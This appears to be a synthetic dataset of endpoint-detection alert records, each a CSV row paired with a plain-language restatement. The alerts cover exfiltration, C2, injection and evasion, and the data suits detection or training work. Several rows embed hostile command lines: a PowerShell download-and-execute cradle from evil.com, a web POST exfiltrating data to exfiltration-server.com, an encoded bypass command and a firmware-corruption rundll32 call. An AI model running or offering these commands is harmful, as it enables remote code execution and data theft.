12345,threat_detection,1646749655000,execution gaurdrails,Execution Guardrails Detected,high,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'id': 'ABC123', 'hostname': 'Workstation-01', 'ip': '192.168.1.100', 'os': 'Windows 10', 'username': 'John.Doe', 'process_name': 'cmd.exe'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,suspicious_activity,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is threat_detection. event_timestamp is 1646749655000. event_category is execution gaurdrails. event_description is Execution Guardrails Detected. severity is high. endpoint id is ABC123. endpoint hostname is Workstation-01. endpoint ip is 192.168.1.100. endpoint os is Windows 10. endpoint username is John.Doe. endpoint process_name is cmd.exe. alert_type is suspicious_activity. 
12345,DetectionSummaryEvent,,data exfiltration,Exfiltration Over Alternative Protocol,high,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'hostname': 'example-hostname', 'domain': 'example-domain', 'os': 'Windows 10'}",,,,,,,,,,,,,,2023-03-08T12:00:00.000000Z,"{'detection_id': '12345678-1234-1234-1234-123456789012', 'detection_name': 'Exfiltration Detection', 'detection_description': 'Detects exfiltration over alternative protocol', 'detection_time': '2023-03-08T12:00:00.000000Z', 'rule_name': 'Exfiltration Detection Rule', 'rule_id': '12345678-1234-1234-1234-123456789012', 'ioc_info': {'ioc_type': 'protocol', 'ioc_value': 'DNS', 'ioc_description': 'Alternative exfiltration protocol'}, 'command_line': 'nslookup example.com 8.8.8.8'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is DetectionSummaryEvent. event_category is data exfiltration. event_description is Exfiltration Over Alternative Protocol. severity is high. host_info hostname is example-hostname. host_info domain is example-domain. host_info os is Windows 10. timestamp is 2023-03-08T12:00:00.000000Z. detection_info detection_id is 12345678-1234-1234-1234-123456789012. detection_info detection_name is Exfiltration Detection. detection_info detection_description is Detects exfiltration over alternative protocol. detection_info detection_time is 2023-03-08T12:00:00.000000Z. detection_info rule_name is Exfiltration Detection Rule. detection_info rule_id is 12345678-1234-1234-1234-123456789012. detection_info ioc_info ioc_type is protocol. detection_info ioc_info ioc_value is DNS. detection_info ioc_info ioc_description is Alternative exfiltration protocol. detection_info command_line is nslookup example.com 8.8.8.8. 
12345,threat detection,1646749655000,data exfiltration,Exfiltration Over C2 Channel Detected,high,,,,,,,,detect,,,,,,,,powershell.exe,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ABC123,DESKTOP-ABC123,192.168.1.100,JohnDoe,DOMAIN,powershell.exe -nop -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/malware.ps1'),1234.0,explorer.exe,5678.0,"{'destination': 'evil.com', 'protocol': 'HTTP'}","[{'name': 'SensitiveData.txt', 'type': 'exfiltrated'}]",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is threat detection. event_timestamp is 1646749655000. event_category is data exfiltration. event_description is Exfiltration Over C2 Channel Detected. severity is high. action is detect. process_name is powershell.exe. sensor_id is ABC123. hostname is DESKTOP-ABC123. ip is 192.168.1.100. user is JohnDoe. domain is DOMAIN. process_command_line is powershell.exe -nop -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/malware.ps1'). parent_process_name is explorer.exe. c2 destination is evil.com. c2 protocol is HTTP. files name is SensitiveData.txt. files type is exfiltrated. 
12345,threat detection,1646749655000,data exfiltration,Exfiltration Over Physical Medium Detected,high,,,,,,,,,,,,,,"{'name': 'USB', 'direction': 'outbound'}",,explorer.exe,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ABC123,DESKTOP-ABC123,192.168.1.100,JohnDoe,DOMAIN,explorer.exe copy SensitiveData.txt E:\,1234.0,,,,"[{'name': 'SensitiveData.txt', 'type': 'exfiltrated'}]",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is threat detection. event_timestamp is 1646749655000. event_category is data exfiltration. event_description is Exfiltration Over Physical Medium Detected. severity is high. protocol name is USB. protocol direction is outbound. process_name is explorer.exe. sensor_id is ABC123. hostname is DESKTOP-ABC123. ip is 192.168.1.100. user is JohnDoe. domain is DOMAIN. process_command_line is explorer.exe copy SensitiveData.txt E:\. files name is SensitiveData.txt. files type is exfiltrated. 
12345678-1234-1234-1234-123456789012,threat detection,2023-03-08T14:30:00Z,exfiltration over web service,Exfiltration Over Web Service Detected,,,,,,high,,,,,,,,,,,explorer.exe,,,,,powershell.exe -c Invoke-WebRequest -Uri http://exfiltration-server.com -Method POST -Body $exfiltrated_data,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5678.0,,,,,,,,,,,,,,,,Microsoft Defender for Endpoint,http://exfiltration-server.com,POST,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345678-1234-1234-1234-123456789012. event_type is threat detection. event_timestamp is 2023-03-08T14:30:00Z. event_category is exfiltration over web service. event_description is Exfiltration Over Web Service Detected. event_severity is high. process_name is explorer.exe. command_line is powershell.exe -c Invoke-WebRequest -Uri http://exfiltration-server.com -Method POST -Body $exfiltrated_data. detection_source is Microsoft Defender for Endpoint. web_server_url is http://exfiltration-server.com. web_server_method is POST. 
12345,alert,1646749655000,Attempted Attack,An attempt was made to exploit a public-facing application on the host.,,,,,"{'hostname': 'host-123', 'ip_address': '192.168.0.1', 'mac_address': '00:11:22:33:44:55'}",,,,Exploit Public-Facing Application,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2023-03-04T10:30:00.000Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is alert. event_timestamp is 1646749655000. event_category is Attempted Attack. event_description is An attempt was made to exploit a public-facing application on the host.. host hostname is host-123. host ip_address is 192.168.0.1. host mac_address is 00:11:22:33:44:55. action is Exploit Public-Facing Application. timestamp is 2023-03-04T10:30:00.000Z. 
12345,alert,2022-03-17T14:30:00Z,Exploitation for Client Execution,Possible Exploitation for Client Execution,high,,,,,,,"{'technique': 'Exploitation for Client Execution', 'affected_process': 'explorer.exe', 'process_id': '1234'}",detect,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'module': 'endpoint', 'product': 'falcon', 'sensor_id': '1234567890abcdef', 'hostname': 'WIN-12345', 'ip_address': '192.168.1.100', 'user': 'DOMAIN\\user'}",,,,,,,,,,,,,,,,,,,,,,,,anomaly,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is alert. event_timestamp is 2022-03-17T14:30:00Z. event_category is Exploitation for Client Execution. event_description is Possible Exploitation for Client Execution. severity is high. event_details technique is Exploitation for Client Execution. event_details affected_process is explorer.exe. event_details process_id is 1234. action is detect. source module is endpoint. source product is falcon. source sensor_id is 1234567890abcdef. source hostname is WIN-12345. source ip_address is 192.168.1.100. source user is DOMAIN\user. type is anomaly. 
12345,evade detection,1646749655000,exploit for defensive evasion,An attempt to exploit a vulnerability in order to evade detection or maintain persistence.,high,,,,"{'hostname': 'server01', 'ip_address': '192.168.1.100'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'ioc': [{'type': 'File Hash', 'value': 'f1a4f16db921e4c4efc6b51a6b10a6f7'}, {'type': 'URL', 'value': 'https://malicious-site.com/exploit'}], 'reason': 'Exploit detected'}",,,,,,,,,,,,,,,,,,,,,{'username': 'admin'},,,,,,,,,,,,"{'process_name': 'cmd.exe', 'process_id': '1234', 'file_path': 'C:\\Windows\\system32\\cmd.exe', 'command_line': 'cmd.exe /c echo hello world'}","{'protocol': 'TCP', 'port': '4444', 'remote_address': '192.168.1.100'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 12345. event_type is evade detection. event_timestamp is 1646749655000. event_category is exploit for defensive evasion. event_description is An attempt to exploit a vulnerability in order to evade detection or maintain persistence.. severity is high. host hostname is server01. host ip_address is 192.168.1.100. detection ioc is {'type': 'File Hash', 'value': 'f1a4f16db921e4c4efc6b51a6b10a6f7'}. detection ioc is {'type': 'URL', 'value': 'https://malicious-site.com/exploit'}. detection reason is Exploit detected. user username is admin. process process_name is cmd.exe. process process_id is 1234. process file_path is C:\Windows\system32\cmd.exe. process command_line is cmd.exe /c echo hello world. network protocol is TCP. network port is 4444. network remote_address is 192.168.1.100. "
12345,alert,1646749655000,external remote services,A connection to an external remote service has been detected.,high,,,,,,,,,,,,,,,,,,,,,,,,,,,,Potential External Remote Services Connection,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'type': 'network', 'subtype': 'socket', 'event_timestamp': '2022-04-01T14:30:00Z', 'src_ip': '', 'dst_ip': '10.0.0.2', 'src_port': '', 'dst_port': '8080', 'protocol': 'tcp', 'http': {'full_uri': 'http://10.0.0.2:8080', 'user_agent': '', 'referer': '', 'request_method': '', 'response_status_code': ''}, 'remote_service': {'name': 'Unknown', 'type': 'Unknown', 'ports': ['8080', '8443'], 'ipv4': '10.0.0.2', 'ipv6': '', 'url': 'http://10.0.0.2:8080', 'certificate': '', 'encryption': 'Unknown', 'authentication': 'Unknown', 'version': 'Unknown', 'product': 'Unknown', 'organization': 'Unknown'}, 'process': {'cmdline': 'explorer.exe /root,C:\\Windows\\system32', 'path': 'C:\\Windows\\explorer.exe', 'pid': 1234, 'name': 'explorer.exe'}}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 12345. event_type is alert. event_timestamp is 1646749655000. event_category is external remote services. event_description is A connection to an external remote service has been detected.. severity is high. event_name is Potential External Remote Services Connection. event type is network. event subtype is socket. event event_timestamp is 2022-04-01T14:30:00Z. event src_ip is . event dst_ip is 10.0.0.2. event src_port is . event dst_port is 8080. event protocol is tcp. event http full_uri is http://10.0.0.2:8080. event http user_agent is . event http referer is . event http request_method is . event http response_status_code is . event remote_service name is Unknown. event remote_service type is Unknown. event remote_service ports is ['8080', '8443']. event remote_service ipv4 is 10.0.0.2. event remote_service ipv6 is . event remote_service url is http://10.0.0.2:8080. event remote_service certificate is . event remote_service encryption is Unknown. event remote_service authentication is Unknown. event remote_service version is Unknown. event remote_service product is Unknown. event remote_service organization is Unknown. event process cmdline is explorer.exe /root,C:\Windows\system32. event process path is C:\Windows\explorer.exe. event process pid is 1234. event process name is explorer.exe. "
123456,alert,,fallback channels,Fallback communication channel detected,,2023-03-09T12:00:00.000000Z,,,,medium,,,,,,,,,,,powershell.exe,,,,,powershell.exe -ep bypass -noexit -enc JABzAD0ATwB1AHQAcAB1AHQAIAAtAEEAdABlAG0AYQBuAGQAYQBsAHMAIAAtAEkARQBYAD0AaQBlAHgAZgBpAGwAbABlAC4AcABhAGMAawBlAG4AdAAoACkALgBFAHgAZQBsAGQAQwBvAG4AdABlAG4AdAAoACcASQBuAHYAbwBrAGUALgBDAGMAcwBvAHUAdABzAHIAaQBvAG4AOgBUAHkAcABlAGwAaQBjAHkAaQBnAGgAIAAnACkAKQAuAEQAZQBzAHQALgBUAGkAZQBsAGwAaQBzAGkAbgBnACgAJwB7ACAAfQA=,,,,,,,,,,Fallback Channels,,,,,,,,,,,,,,,,,,,,,,,,,1234.0,,,,,,,,,,,,,,,,,,,,,"{'protocol': 'http', 'dst_ip': '192.168.1.100', 'dst_port': '80'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 123456. event_type is alert. event_category is fallback channels. event_description is Fallback communication channel detected. event_time is 2023-03-09T12:00:00.000000Z. event_severity is medium. process_name is powershell.exe. command_line is powershell.exe -ep bypass -noexit -enc JABzAD0ATwB1AHQAcAB1AHQAIAAtAEEAdABlAG0AYQBuAGQAYQBsAHMAIAAtAEkARQBYAD0AaQBlAHgAZgBpAGwAbABlAC4AcABhAGMAawBlAG4AdAAoACkALgBFAHgAZQBsAGQAQwBvAG4AdABlAG4AdAAoACcASQBuAHYAbwBrAGUALgBDAGMAcwBvAHUAdABzAHIAaQBvAG4AOgBUAHkAcABlAGwAaQBjAHkAaQBnAGgAIAAnACkAKQAuAEQAZQBzAHQALgBUAGkAZQBsAGwAaQBzAGkAbgBnACgAJwB7ACAAfQA=. rule_name is Fallback Channels. network protocol is http. network dst_ip is 192.168.1.100. network dst_port is 80. 
12345,Firmware Corruption,,firmware corruption,Crowdstrike Falcon detected firmware corruption on endpoint.,High,2022-03-06T09:18:56Z,,,"{'hostname': 'DESKTOP-ABC123', 'machine_id': '12345'}",,,,,,,,,,,,,,,,,,,,EDR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'process_name': 'cmd.exe', 'command_line': 'cmd.exe /c rundll32.exe bios.dll,CorruptFirmware'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 12345. event_type is Firmware Corruption. event_category is firmware corruption. event_description is Crowdstrike Falcon detected firmware corruption on endpoint.. severity is High. event_time is 2022-03-06T09:18:56Z. host hostname is DESKTOP-ABC123. host machine_id is 12345. detection_method is EDR. process process_name is cmd.exe. process command_line is cmd.exe /c rundll32.exe bios.dll,CorruptFirmware. "
12345,alert,1646749655000,hardware additions,This alert is triggered when new hardware is detected on the endpoint.,HIGH,,,,,,,,,Hardware addition detected on endpoint,,Hardware Additions,,,,,,,,,,,,,,,,,Possible Hardware Additions Detected,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'tags': ['T1200', 'Hardware Additions', 'Endpoint Detection']}",,,,,,,,,,,,,,,,,,,,,,"{'event': {'type': 'HardwareAddition', 'detection_id': '12345', 'device_type': 'Physical'}}","{'action': ['Investigate the hardware addition to determine if it is legitimate or unauthorized', 'If the hardware is unauthorized, remove it from the endpoint immediately', 'Consider implementing endpoint security controls to prevent unauthorized hardware additions']}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 12345. event_type is alert. event_timestamp is 1646749655000. event_category is hardware additions. event_description is This alert is triggered when new hardware is detected on the endpoint.. severity is HIGH. detect_description is Hardware addition detected on endpoint. technique is Hardware Additions. event_name is Possible Hardware Additions Detected. metadata tags is T1200. metadata tags is Hardware Additions. metadata tags is Endpoint Detection. trigger event type is HardwareAddition. trigger event detection_id is 12345. trigger event device_type is Physical. remediation action is Investigate the hardware addition to determine if it is legitimate or unauthorized. remediation action is If the hardware is unauthorized, remove it from the endpoint immediately. remediation action is Consider implementing endpoint security controls to prevent unauthorized hardware additions. "
7294060-3,threat detection,2023-03-10T14:00:00Z,artifact_hiding,"An attempt to hide artifacts such as files, processes or registry keys from detection or analysis.",high,,,,{'hostname': 'server01'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,{'reason': 'Attempt to hide malware file'},,,,,,,,,,,,,,,,,,,,,{'username': 'admin'},,,,,,,,,,,,"{'process_name': 'explorer.exe', 'process_id': '5678'}",,,,,"{'artifact_type': 'File', 'artifact_path': 'C:\\Windows\\system32\\cmd.exe', 'artifact_name': 'malware.exe'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 7294060-3. event_type is threat detection. event_timestamp is 2023-03-10T14:00:00Z. event_category is artifact_hiding. event_description is An attempt to hide artifacts such as files, processes or registry keys from detection or analysis.. severity is high. host hostname is server01. detection reason is Attempt to hide malware file. user username is admin. process process_name is explorer.exe. process process_id is 5678. artifact_hiding artifact_type is File. artifact_hiding artifact_path is C:\Windows\system32\cmd.exe. artifact_hiding artifact_name is malware.exe. "
93858y60,detect,2023-03-10T15:00:00Z,process_injection,An attempt to hijack the execution flow of a legitimate process.,high,,,,{'hostname': 'server01'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,{'reason': 'Unauthorized process injection'},,,,,,,,,,,,,,,,,,,,,{'username': 'user01'},,,,,,,,,,,,,,,,,,"{'process_name': 'svchost.exe', 'injected_process_name': 'malware.exe', 'injection_technique': 'Reflective DLL Injection'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 93858y60. event_type is detect. event_timestamp is 2023-03-10T15:00:00Z. event_category is process_injection. event_description is An attempt to hijack the execution flow of a legitimate process.. severity is high. host hostname is server01. detection reason is Unauthorized process injection. user username is user01. process_injection process_name is svchost.exe. process_injection injected_process_name is malware.exe. process_injection injection_technique is Reflective DLL Injection. 
03040540f,detect,2023-03-10T16:00:00Z,security_control_disablement,An attempt to disable or bypass security controls to avoid detection.,high,,,,{'hostname': 'laptop01'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,{'reason': 'Unauthorized security control disablement'},,,,,,,,,,,,,,,,,,,,,{'username': 'user01'},,,,,,,,,,,,,,,,,,,{'control_name': 'CrowdStrike Falcon'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 03040540f. event_type is detect. event_timestamp is 2023-03-10T16:00:00Z. event_category is security_control_disablement. event_description is An attempt to disable or bypass security controls to avoid detection.. severity is high. host hostname is laptop01. detection reason is Unauthorized security control disablement. user username is user01. security_control_disablement control_name is CrowdStrike Falcon. 
EDR-54321,Implanted Container Image,,implant internal image,Implanted internal container image detected on host SERVER-789,,2022-10-31T09:23:45Z,,,,High,"[{'host_name': 'SERVER-789', 'ip_address': '192.168.1.201'}]","{'image_name': 'implanted-container-image-1', 'source_ip': '192.168.1.202', 'destination_ip': '192.168.1.201', 'process_name': 'explorer.exe', 'user': 'admin', 'container_id': '1234567890abcdef'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is EDR-54321. event_type is Implanted Container Image. event_category is implant internal image. event_description is Implanted internal container image detected on host SERVER-789. event_time is 2022-10-31T09:23:45Z. event_severity is High. affected_hosts host_name is SERVER-789. affected_hosts ip_address is 192.168.1.201. event_details image_name is implanted-container-image-1. event_details source_ip is 192.168.1.202. event_details destination_ip is 192.168.1.201. event_details process_name is explorer.exe. event_details user is admin. event_details container_id is 1234567890abcdef. 
30406gfd,detect,2023-03-10T17:00:00Z,file_deletion,An attempt to remove indicators of compromise to avoid detection.,high,,,,{'hostname': 'desktop01'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,{'reason': 'Unauthorized file deletion'},,,,,,,,,,,,,,,,,,,,,{'username': 'user01'},,,,,,,,,,,,,,,,,,,,{'file_path': 'C:\\ProgramData\\malware.exe'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 30406gfd. event_type is detect. event_timestamp is 2023-03-10T17:00:00Z. event_category is file_deletion. event_description is An attempt to remove indicators of compromise to avoid detection.. severity is high. host hostname is desktop01. detection reason is Unauthorized file deletion. user username is user01. file_deletion file_path is C:\ProgramData\malware.exe. 
EDR-123456,detect,,process-monitoring,Detected suspicious inter-process communication between two different processes.,high,2022-04-05T13:45:00Z,,,,,,,,,,,,,,,,,,,,,,,,,1.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Suspicious Inter-Process Communication,"[{'entity_type': 'process', 'process_name': 'Process A', 'process_path': 'C:\\Program Files\\ProcessA\\ProcessA.exe', 'process_hash': 'ABCD1234', 'process_command_line': 'ProcessA.exe /arg1', 'process_pid': 1234}, {'entity_type': 'process', 'process_name': 'Process B', 'process_path': 'C:\\Windows\\System32\\cmd.exe', 'process_hash': 'EFGH5678', 'process_command_line': 'cmd.exe /c netstat', 'process_pid': 5678}]",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is EDR-123456. event_type is detect. event_category is process-monitoring. event_description is Detected suspicious inter-process communication between two different processes.. severity is high. event_time is 2022-04-05T13:45:00Z. name is Suspicious Inter-Process Communication. affected_entities entity_type is process. affected_entities process_name is Process A. affected_entities process_path is C:\Program Files\ProcessA\ProcessA.exe. affected_entities process_hash is ABCD1234. affected_entities process_command_line is ProcessA.exe /arg1. affected_entities process_pid is 1234. affected_entities entity_type is process. affected_entities process_name is Process B. affected_entities process_path is C:\Windows\System32\cmd.exe. affected_entities process_hash is EFGH5678. affected_entities process_command_line is cmd.exe /c netstat. affected_entities process_pid is 5678. 
098765,threat detection,,Command and Scripting Interpreter,"The system command interpreter (cmd.exe) was launched by a non-standard parent process. This could indicate the use of a custom command interpreter, which could be an indicator of malicious activity.",high,2022-03-03T13:42:17Z,,,{'name': 'DESKTOP-ABC123'},,,,,,,,,,,,,Command and Scripting Interpreter,,,,,"{'name': 'MyCustomProcess.exe', 'path': 'C:\\Program Files\\MyApp\\MyCustomProcess.exe', 'command_line': 'MyCustomProcess.exe /run'}",,,,1.0,,Command Interpreter Launched by Unusual Parent Process,,,,,,,,,,,,,,,,,,,,,,,EDR,,,,,,,,,,,,,JohnDoe,,,,,,,,,,,,,,,,,,,,,,,192.168.1.100,[{'phase_name': 'Command and Scripting Interpreter'}],"{'name': 'cmd.exe', 'path': 'C:\\Windows\\System32\\cmd.exe', 'command_line': ""cmd.exe /c echo 'Hello World'""}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 098765. event_type is threat detection. event_category is Command and Scripting Interpreter. event_description is The system command interpreter (cmd.exe) was launched by a non-standard parent process. This could indicate the use of a custom command interpreter, which could be an indicator of malicious activity.. severity is high. event_time is 2022-03-03T13:42:17Z. host name is DESKTOP-ABC123. technique_name is Command and Scripting Interpreter. parent_process name is MyCustomProcess.exe. parent_process path is C:\Program Files\MyApp\MyCustomProcess.exe. parent_process command_line is MyCustomProcess.exe /run. event_name is Command Interpreter Launched by Unusual Parent Process. source is EDR. user is JohnDoe. dst_ip is 192.168.1.100. kill_chain_phases phase_name is Command and Scripting Interpreter. file name is cmd.exe. file path is C:\Windows\System32\cmd.exe. file command_line is cmd.exe /c echo 'Hello World'. "
